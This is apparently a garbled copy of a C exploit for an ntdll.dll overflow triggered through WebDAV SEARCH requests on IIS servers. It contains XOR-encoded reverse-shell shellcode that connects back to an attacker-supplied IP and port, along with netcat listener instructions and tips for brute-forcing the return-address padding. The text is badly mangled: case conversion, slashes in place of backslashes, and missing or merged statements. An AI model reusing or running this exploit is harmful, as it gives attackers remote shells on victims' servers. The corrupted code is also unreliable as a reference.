/ ************************************************** ****************** /
/ * [CRPT] NTDLL.DLL EXPLOIT TROUGH WebDAV by Kralor [CRPT] * /
/ * ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------- * /
/ * this is the expel for ntdll.dll through webdav. * /
/ * Run a Netcat EX: NC -L -VV -P 666 * /
/ * WB server.com your_ip 666 0 * /
/ * The shellcode is a reverse remote shell * /
/ * You need to pad a bit .. The Best Way I thinkbs launching * /
/ * The experament with pad = 0 and after this, the server will be * /
/ * Down for a couple of seconds, now retry with pad at 1 * /
/ * And so on..pad 2 .. pad 3 .. if you have.com '' 's'' * * /
/ * Something Like Pad At 10 I thisk you better to restart from * /
/ * Pad at 0. ON My Local Iis The Pad Was AT 1 (0x00110011) But * /
/ * ON All The Others Servers IT WAS AT 2, 3, 4, ETC..SMetimes * /
/ * You Can Have the force with you, and get the shell in 1 try * /
/ * Sometimes you need to pad more Than 10 Times;) * /
/ * The shellcode tas code by myself, IT IS SEH ScanMem to * /
/ * Find the family offsets (getProcaddress) .. * /
/ * * /
/ ************************************************** ****************** /
#include
#include
#include
#pragma comment (Lib, "WS2_32")
Char shellc0de [] =
"/ X55 / XC9 / X53 / X56 / X57 / X8D / X7D / XA2 / XB1 / X25 / XB8 / XCC / XCC"
"/ XCC / XCC / XF3 / XAB / XEB / X09 / XEB / X0C / X58 / X5B / X59 / X5A / X5C / X5D / XC3 / XE8"
"/ XF2 / XFF / XFF / XFF / X5B / X80 / XC3 / X10 / X33 / XC9 / X66 / XB9 / XB5 / X01 / X80 / X33"
"/ X95 / X43 / XE2 / XFA / X66 / X83 / XEB / X67 / XFC / X8B / XCB / X8B / XF3 / X66 / X83 / XC6"
"/ x46 / xad / x16 / x55 / x38 / x13 / x00 / x00 / x00 / x8b / x64 / x24 / x08"
"/ x64 / x8f / x00 / x00 / x58 / x5d / x5e / Xeb / XE5 / X58 / XEB / XB9 / X64" "/ XFF / X35 / X00 / X00 / X00 / X00 / X64 / X89 / X25 / X00 / X00 / X00 / X00 / X48 / X66 / X81 "
"/ x38 / x4d / x5a / x75 / xdb / x64 / x8f / x05 / x00 / x00 / x00 / x00 / x5d / x5e / x8b / xe8"
"/ X03 / X40 / X78 / X03 / XFD / X8B / X77 / X20 / X03 / XF5 / X33 / XD2 / X8B"
"/ x06 / x03 / x47 / x65 / x74 / x50 / x75 / x25 / x81 / x78 / x04 / x72 / x6f"
"/ x63 / x41 / x78 / x08 / x64 / x64 / x72 / x65 / x75 / x13 / x8b / x47 / x24"
"/ X03 / XC5 / X0F / XB7 / X1C / X50 / X8B / X47 / X1C / X03 / XC5 / X8B / X1C / X98 / X03 / XDD"
"/ X83 / XC6 / X04 / X42 / X3B / X57 / X18 / X75 / XC6 / X8B / XF1 / X56 / X55 / XFF / XD3 / X83"
"/ XC6 / X0F / X89 / X44 / X24 / X20 / X56 / X55 / XFF / XD3 / X8B / XEC / X81 / XEC / X94 / X00"
"/ X00 / X00 / X83 / XC6 / X0D / X56 / XFF / XD0 / X89 / X85 / X7C / XFF / XFF / XFF / X89 / X9D"
"/ X78 / XFF / XFF / XFF / X83 / XC6 / X0B / X56 / X50 / XC9 / X51 / X51 / X51"
"/ X51 / X41 / X51 / X41 / X51 / XFF / XD0 / X89 / X85 / X94 / X00 / X00 / X00 / X8B / X85 / X7C"
"/ XFF / XFF / XFF / X83 / XC6 / X0B / X56 / X50 / XFF / XD3 / X83 / XC6 / X08 / X6A / X10 / X56"
"/ x8b / x8d / x94 / x00 / x00 / x00 / x51 / xdb / xc7 / x45 / x8c / x44 / x00"
"/ x00 / x00 / x89 / x5d / x94 / x89 / x5d / x98 / x89 / x5d / x9c / x89 / x5d"
"/ xa0 / x89 / x5d / xa8 / xc7 / x45 / xb8 / x01 / x01 / x00 / x00 / x89 / x5d"
"/ XBC / X89 / X9D / XC0 / X00 / X00 / X00 / X89 / X5D / XC4 / X89 / X5D / XC8"
"/ x89 / x5d / xcc / x8d / x45 / xd0 / x50 / x8d / x4d / x8c / x51 / x6a / x00 / x6a / x00 / x6a"
"/ x00 / x6a / x01 / x6a / x00 / x6a / x00 / x83 / xc6 / x00 / x8b / x45 / x20"
"/ xff / xd0"
"CreateProcessa / X00LoadLibrarya / X00WS2_32.dll / x00wsasocketa / x00"
"CONNECT / X00 / X02 / X00 / X02 / X9A / XC0 / XA8 / X01 / X01 / X00"
"cmd" // don't change ..
"/ x00 / x00 / xe7 / x77" // offsets of kernel32.dll for some win ver ..
"/ x00 / x00 / xe8 / x77"
"/ x00 / x00 / xf0 / x77" "/ x00 / x00 / xe4 / x77"
"/ x00 / x88 / x3e / x04" // Win2k3
"/ x00 / x00 / xf7 / xbf" // Win9x = P
"/ XFF / XFF / XFF / XFF";
INT TEST_HOST (Char * Host)
{
CHAR Search [100] = "";
Int Sock;
Struct Hostent * HEH;
Struct SockAddr_in HMM;
Char BUF [100] = ""
IF (Strlen> 60) {
Printf ("Error: Victim Host Too Long./R/N");
Return 1;
}
IF ((HOH = gethostByname (Host)) == 0) {
Printf ("Error: can't resolve '% s'", host);
Return 1;
}
Sprintf (Search, "Search / HTTP / 1.1 / R / NHOST:% S / R / N / R / N", Host);
HMM.SIN_PORT = HTONS (80);
HMM.SIN_FAMILY = AF_INET;
HMM.SIN_ADDR = * (Struct in_addr *) HEH-> h_addr);
IF ((Sock = Socket (AF_INET, SOCK_STREAM, 0)) == -1) {
Printf ("Error: can't create socket");
Return 1;
}
Printf ("Checking WebDAV on '% s' ...", Host);
IF ((Connect (STRUCK, STRUCKADDR *) & HMM, SIZEOF (HMM)) == -1) {
Printf ("Connecting_ERROR / R / N");
Return 1;
}
Send (SOCK, Search, Strlen (Search), 0);
RECV (Sock, BUF, SIZEOF (BUF), 0);
IF (BUF [9] == '4' && buf [10] == '1' && buf [11] == '1')
Return 0;
Printf ("Not Found / R / N");
Return 1;
}
Void Help (Char * Program)
{
Printf ("Syntax:% s
Return;
}
Void Banner (Void)
{
Printf ("/ R / N / T [CRPT] NTDLL.DLL EXPLOIT TROUGH Webdav by Kralor
[CRPT] / R / N ");
Printf ("/ t / tww.coromputer.net && undernet # coompute / r / n / r / n");
Return;
}
Void main (int Argc, char * argv [])
{
Wsadata wsadata;
UNSIGNED SHORT port = 0;
Char * port_to_shell = "", * ip1 = "", data [50] = ""; unsigned Int i, j;
Unsigned int ip = 0;
INT S, PAD = 0x10;
Struct hostent * he;
Struct SockAddr_in crpt;
CHAR BUFFER [65536] = ""
Char Request [80000]; // Huuuh, what a mess! :)
Char content [] =
" / r / n"
"
"
"SELECT /" DAV: DISPLAYNAME / "from scope () / r / n"
" / R / N"
" / r / n";
Banner ();
IF ((Argc <4) || (Argc> 5)) {
Help (Argv [0]);
Return;
}
IF (WSAStartup (0x0101, & WSADATA)! = 0) {
Printf ("ERROR Starting Winsock ..");
Return;
}
IF (Test_Host (Argv [1])))
Return;
IF (argc == 5)
PAD = ATOI (Argv [4]);
Printf ("FOUND / R / NexPloiting NTDLL.DLL THROUGH WebDAV [RET: 0x00% 02x00% 02x] / R / N", PAD, PAD)
IP = INET_ADDR (Argv [2]); IP1 = (char *) & IP;
Shellc0de [448] = IP1 [0]; shellc0de [449] = IP1 [1]; shellc0de [450] = IP1 [2];
Shellc0de [451] = IP1 [3];
Port = HTONS (ATOI (Argv [3]));
Port_to_shell = (char *) & port;
Shellc0de [446] = port_to_shell [0];
Shellc0de [447] = port_to_shell [1];
// We xor the shellcode [xored by 0x95 to avoid bad chars]
__ASM {
Lea Eax, Shellc0de
Add eax, 0x34
XOR ECX, ECX
MOV CX, 0x1B0
WAH:
XOR BYTE PTR [EAX], 0x95
INC EAX
Loop WAH
}
IF ((he = gethostByname) == 0) {
Printf ("Error: can't resolve '% s'", argv [1]);
Return;
}
CRPT.SIN_PORT = HTONS (80);
CRPT.SIN_FAMILY = AF_INET;
CRPT.SIN_ADDR = * (Struct In_Addr *) HE-> H_ADDR);
IF ((S = Socket, Sock_Stream, 0)) == -1) {Printf ("Error: can't create socket);
Return;
}
Printf ("Connecting ...");
IF ((S., Struct SockAddr *) & CRPT, SIZEOF (CRPT))) == -1) {
Printf ("Error / R / N");
Return;
}
// no operation.
For (i = 0; i // Fill the buffer with the shellcode For (i = 64000, j = 0; I // Well..it is not necessary .. For (i = 0; i <2500; buffer [i] = pad, i ); / * WE CAN SIMPLY PUT OUR RET IN THIS 2 OFFSETS .. * / // buffer [2086] = PAD; // buffer [2085] = PAD; Buffer [Sizeof] = 0x00; MEMSET (Request, 0, Sizeof (Request)); MEMSET (DATA, 0, SIZEOF (DATA); Sprintf (Request, "Search /% S HTTP / 1.1 / R / NHOST:% S / R / NCONTENT-TYPE: TEXT / XML / R / NCONTENT-length:", Buffer, Argv [1]); Sprintf (Request, "% S% D / R / N / R / N", request, strlen (content); Printf ("Connected / R / NSENDING Evil Request ..."); Send (S, REQUEST, STRLEN (Request), 0); Send (S, Content, Strlen (Content), 0); Printf ("SENT / R / N"); RECV (S, DATA, SIZEOF (DATA), 0); IF (Data [0]! = 0x00) { Printf ("Server Seems to Be Patch); Printf ("DATA:% S / R / N", DATA); Else Printf ("Now if you are lucky you will get a shell./r/n"); CloseSocket (s); Return; }
